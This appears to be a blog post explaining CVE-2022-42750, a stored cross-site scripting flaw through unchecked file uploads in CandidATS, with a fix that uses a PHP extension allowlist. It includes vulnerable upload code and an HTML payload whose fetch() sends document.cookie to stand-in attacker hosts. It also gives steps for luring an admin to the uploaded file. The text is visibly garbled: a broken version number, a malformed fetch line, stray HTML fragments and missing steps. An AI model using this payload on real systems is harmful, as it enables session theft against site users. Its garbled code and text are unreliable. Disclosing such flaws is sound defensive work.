CVE-2022-42750 - File Upload Flaw in CandidATS 3.. Lets Attackers Steal User Cookies

CandidATS is a popular open-source applicant tracking system used by many companies. In version 3.., it has a dangerous vulnerability known as CVE-2022-42750. This flaw lets attackers upload files with malicious code, which can run in the browser of anyone visiting the system. When victims click the bad file, their cookies can be stolen—letting the attacker hijack user sessions.

Let’s walk through how this attack works step by step, see the actual code problem, and show a proof-of-concept exploit.

Understanding the Vulnerability

CandidATS version 3.. allows authenticated users to upload files (like resumes, cover letters, profile pictures, etc.). But it does not properly check what kind of files are being uploaded.

Because of this, an attacker can upload a file containing JavaScript code, such as an HTML file with a <script> tag or a file with a .php or .js extension (depending on server config). When someone else opens that file, the script runs inside their browser—this is called a Stored Cross-Site Scripting (XSS) attack.

Let’s look at what the file upload code might look like (simplified for this example)

// When user uploads a file (PHP)
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file);
echo "File uploaded!";

This means an attacker can upload something dangerous, like evil.html

<!-- evil.html -->
<script>
  fetch('https://evil.example.com/steal?cookie='; + document.cookie);
</script>

</h2><p>     fetch('<a href="https://your.evil.site/c/?c=" rel="nofollow">https://your.evil.site/c/?c=</a>' + document.cookie);<br>

`

3. Send the file link (e.g., https://candidats.example.com/uploads/innocent.html) to a privileged user (like an admin) or trick them into clicking it (e.g., as part of an application).
4. When the victim opens the file, their browser runs the script, which sends their cookies to the attacker’s server (your.evil.site).

Sanitize file names and content: To prevent script injection.

- Store files outside of web root: Don’t let users access files directly via browser if possible.

Example check in PHP

$allowed = ['pdf','doc','docx','jpg','jpeg','png'];
$ext = strtolower(pathinfo($_FILES["fileToUpload"]["name"], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed)) {
    die("File type not allowed.");
}

More Information & References

- Official CVE-2022-42750 Entry
- CandidATS GitHub Repository
- OWASP: Unrestricted File Upload
- How to Secure File Uploads in PHP

Conclusion

CVE-2022-42750 in CandidATS 3.. is a classic but critical flaw made by not filtering file uploads. Attackers can exploit this to steal cookies and hijack sessions. If you use CandidATS, make sure you update your system or patch your file upload handling ASAP. Always validate file uploads—it’s one of the most common security mistakes in web apps!

Have questions or want to see more exploit examples? Leave a comment below. Stay safe!


*Note: This post is for educational purposes ONLY. Do not test these methods on systems you don’t own or have legal permission to test.*

Timeline

Published on: 11/03/2022 18:15:00 UTC
Last modified on: 11/04/2022 15:04:00 UTC